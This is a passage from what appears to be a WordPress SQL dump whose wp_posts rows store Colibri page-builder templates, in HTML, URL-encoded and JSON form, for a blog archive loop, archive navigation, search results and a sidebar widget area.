ol-lg-auto%20h-col-md-auto%20h-col-auto%20style-142-outer%20style-local-40-m5-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2240-m5%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-142%20style-local-40-m5%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2240-m6%22%20class=%22h-blog-categories%20style-143%20style-local-40-m6%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3Cdiv%20%20%20data-colibri-id=%2240-m7%22%20class=%22h-blog-title%20style-144%20style-local-40-m7%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2240-m8%22%20class=%22h-blog-meta%20style-145%20style-local-40-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%7C%20%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2240-m9%22%20class=%22style-146%20style-local-40-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%22%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20%20data-colibri-id=%2240-m10%22%20class=%22h-x-container%20style-147%20style-local-40-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-40-m10-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-148-outer%20style-local-40-m11-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%2240-m11%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-148%20style-local-40-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-148-icon%20style-local-40-m11-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/arrow-right%5D%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n      </div>\n  </div>[colibri_layout_wrapper name=\"navigation_container\"]\n  <div data-colibri-id=\"40-m12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-149 style-local-40-m12 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col style-150-outer style-local-40-m13-outer\">\n        <div data-colibri-id=\"40-m13\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-150 style-local-40-m13 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n            <!---->\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-151-outer style-local-40-m14-outer\">\n        <div data-colibri-id=\"40-m14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-151 style-local-40-m14 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m15\" class=\"style-152 style-local-40-m15 position-relative h-element\">\n              <!---->\n              <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Back\"]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-153-outer style-local-40-m16-outer\">\n        <div data-colibri-id=\"40-m16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-153 style-local-40-m16 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m17\" class=\"style-154 style-local-40-m17 position-relative h-element\">\n              <!---->\n              <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-155-outer style-local-40-m18-outer\">\n        <div data-colibri-id=\"40-m18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-155 style-local-40-m18 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m19\" class=\"style-156 style-local-40-m19 position-relative h-element\">\n              <!---->\n              <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>[/colibri_layout_wrapper]\n  <div data-colibri-id=\"40-m20\" id=\"search-results\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-157 style-local-40-m20 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg-12 h-col-md-12 h-col-12 style-158-outer style-local-40-m21-outer\">\n        <div data-colibri-id=\"40-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-158 style-local-40-m21 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <hop-archive-navigation previewid=\"40-m22\" hmodel=\"[object Object]\" parentmodelobj=\"[object Object]\" rootmodel=\"[object Object]\" ispreview=\"true\" class=\"h-element\"></hop-archive-navigation>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_search','','publish','closed','closed','','40','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',0,'https://gsudice.dataconn.net/?post_type=extb_post_main&#038;p=40',0,'extb_post_main','',0),(41,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-archive-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-categories-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"40-m5\",\"parentId\":\"40-m4\",\"partialId\":40,\"children\":[{\"name\":\"hop-post-categories\",\"slot\":null,\"parentId\":\"40-m5\",\"index\":1,\"id\":\"40-m6\",\"partialId\":40,\"styleRef\":143,\"type\":\"main\",\"props\":{\"prefix\":\"\"}}],\"styleRef\":142,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m3\",\"index\":1,\"id\":\"40-m4\",\"partialId\":40,\"styleRef\":141,\"type\":\"main\"},{\"name\":\"hop-post-title\",\"parentId\":\"40-m3\",\"id\":\"40-m7\",\"partialId\":40,\"styleRef\":144,\"type\":\"main\",\"props\":{\"headingType\":\"h4\"}},{\"name\":\"hop-post-meta\",\"parentId\":\"40-m3\",\"id\":\"40-m8\",\"partialId\":40,\"styleRef\":145,\"type\":\"main\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"showIcons\":false,\"separator\":\"| \"},\"slot\":null,\"index\":3},{\"name\":\"hop-post-excerpt\",\"id\":\"40-m9\",\"parentId\":\"40-m3\",\"partialId\":40,\"styleRef\":146,\"type\":\"main\"},{\"name\":\"hop-post-read-more-group\",\"children\":[{\"name\":\"hop-post-read-more\",\"props\":{\"text\":\"read more\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"40-m11\",\"parentId\":\"40-m10\",\"partialId\":40,\"styleRef\":148,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m3\",\"index\":4,\"id\":\"40-m10\",\"partialId\":40,\"styleRef\":147,\"type\":\"main\"}],\"id\":\"40-m3\",\"parentId\":\"40-m2\",\"partialId\":40,\"styleRef\":140,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"40-m1\",\"index\":0,\"id\":\"40-m2\",\"partialId\":40,\"styleRef\":139,\"type\":\"main\"},{\"name\":\"hop-post-nav-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"40-m13\",\"parentId\":\"40-m12\",\"partialId\":40,\"styleRef\":150,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m14\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"40-m14\",\"index\":0,\"id\":\"40-m15\",\"partialId\":40,\"styleRef\":152,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"stateType\":\"hover\",\"prevLabel\":\"Back\"}}],\"styleRef\":151,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m16\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-pagination\",\"slot\":null,\"parentId\":\"40-m16\",\"index\":0,\"id\":\"40-m17\",\"partialId\":40,\"styleRef\":154,\"type\":\"main\",\"props\":{\"stateType\":\"active\"}}],\"styleRef\":153,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m18\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"40-m18\",\"index\":0,\"id\":\"40-m19\",\"partialId\":40,\"styleRef\":156,\"type\":\"main\",\"props\":{\"stateType\":\"hover\",\"nextLabel\":\"Next\"}}],\"styleRef\":155,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m1\",\"index\":4,\"id\":\"40-m12\",\"partialId\":40,\"styleRef\":149,\"type\":\"main\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-archive-navigation\",\"slot\":null,\"parentId\":\"40-m21\",\"index\":1,\"id\":\"40-m22\",\"partialId\":40,\"styleRef\":159,\"type\":\"main\"}],\"id\":\"40-m21\",\"parentId\":\"40-m20\",\"partialId\":40,\"styleRef\":158,\"type\":\"main\"}],\"id\":\"40-m20\",\"parentId\":\"40-m1\",\"partialId\":40,\"styleRef\":157,\"type\":\"main\",\"props\":{\"name\":\"Search results\",\"attrs\":{\"id\":\"search-results\"}}}],\"id\":\"40-m1\",\"partialId\":40,\"styleRef\":138,\"type\":\"main\"}','','','publish','closed','closed','','41','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=41',0,'extb_post_json','',0),(42,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"40-m1\" class=\"style-138 style-local-40-m1 position-relative\">\n  <!---->\n  <div data-colibri-id=\"40-m2\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-3 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-3 gutters-row-v-3 colibri-dynamic-list style-139 style-local-40-m2 position-relative\">\n    <!---->\n    <div data-colibri-component=\"\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-3 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-3 gutters-col-v-3 style-139-row style-local-40-m2-row\">\n      <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-140-outer%20style-local-40-m3-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22639-m3%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-140%20style-local-40-m3%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22639-m4%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-141%20style-local-40-m4%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-142-outer%20style-local-40-m5-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22639-m5%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-142%20style-local-40-m5%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22639-m6%22%20class=%22h-blog-categories%20style-143%20style-local-40-m6%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3Cdiv%20%20%20data-colibri-id=%22639-m7%22%20class=%22h-blog-title%20style-144%20style-local-40-m7%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22639-m8%22%20class=%22h-blog-meta%20style-145%20style-local-40-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%7C%20%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22639-m9%22%20class=%22style-146%20style-local-40-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%22%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20%20data-colibri-id=%22639-m10%22%20class=%22h-x-container%20style-147%20style-local-40-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-40-m10-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-148-outer%20style-local-40-m11-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%22639-m11%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-148%20style-local-40-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-148-icon%20style-local-40-m11-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%3Csvg%20version=%221.1%22%20xmlns=%22http://www.w3.org/2000/svg%22%20xmlns:xlink=%22http://www.w3.org/1999/xlink%22%20id=%22arrow-right%22%20viewBox=%220%200%20512%20545.5%22%3E%3Cpath%20d=%22M299.5%20140.5l136%20136%2011%2011.5-11%2011.5-136%20136-23-23L385%20304H64v-32h321L276.5%20163.5z%22%3E%3C/path%3E%3C/svg%3E%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n      </div>\n  </div>[colibri_layout_wrapper name=\"navigation_container\"]\n  <div data-colibri-id=\"40-m12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-149 style-local-40-m12 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col style-150-outer style-local-40-m13-outer\">\n        <div data-colibri-id=\"40-m13\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-150 style-local-40-m13 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n            <!---->\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-151-outer style-local-40-m14-outer\">\n        <div data-colibri-id=\"40-m14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-151 style-local-40-m14 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m15\" class=\"style-152 style-local-40-m15 position-relative h-element\">\n              <!---->\n              <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Back\"]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-153-outer style-local-40-m16-outer\">\n        <div data-colibri-id=\"40-m16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-153 style-local-40-m16 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m17\" class=\"style-154 style-local-40-m17 position-relative h-element\">\n              <!---->\n              <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-155-outer style-local-40-m18-outer\">\n        <div data-colibri-id=\"40-m18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-155 style-local-40-m18 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m19\" class=\"style-156 style-local-40-m19 position-relative h-element\">\n              <!---->\n              <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>[/colibri_layout_wrapper]\n  <div data-colibri-id=\"40-m20\" id=\"search-results\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-157 style-local-40-m20 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg-12 h-col-md-12 h-col-12 style-158-outer style-local-40-m21-outer\">\n        <div data-colibri-id=\"40-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-158 style-local-40-m21 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <hop-archive-navigation previewid=\"639-m22\" hmodel=\"[object Object]\" parentmodelobj=\"[object Object]\" rootmodel=\"[object Object]\" ispreview=\"true\" class=\"h-element\"></hop-archive-navigation>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_search','','inherit','closed','closed','','40-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',40,'https://gsudice.dataconn.net/?p=42',0,'revision','',0),(43,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div disabled-ui=\"true\" data-colibri-id=\"43-s1\" class=\"style-160 style-local-43-s1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"43-s2\" id=\"blog-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-161 style-local-43-s2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"43-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-166 style-local-43-s3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-167-outer style-local-43-s4-outer\">\n            <div data-colibri-id=\"43-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-167 style-local-43-s4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-component=\"widget-area\" data-colibri-id=\"43-s5\" class=\"h-widget-area style-168 style-local-43-s5 position-relative h-element\">\n                  <!---->\n                  <div class=\"widget-shortcode h-global-transition-all\">[colibri_widget_area id=\"sidebar-1\"]</div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"43-s6\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"43-s7\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"43-s8\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"43-s9\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"43-s10\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"43-s11\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"43-s12\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','sidebar_post','','publish','closed','closed','','43','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',0,'https://gsudice.dataconn.net/?post_type=extb_post_sidebar&#038;p=43',0,'extb_post_sidebar','',0),(44,1,'2022-02-15 15:45:51','2022-02-15 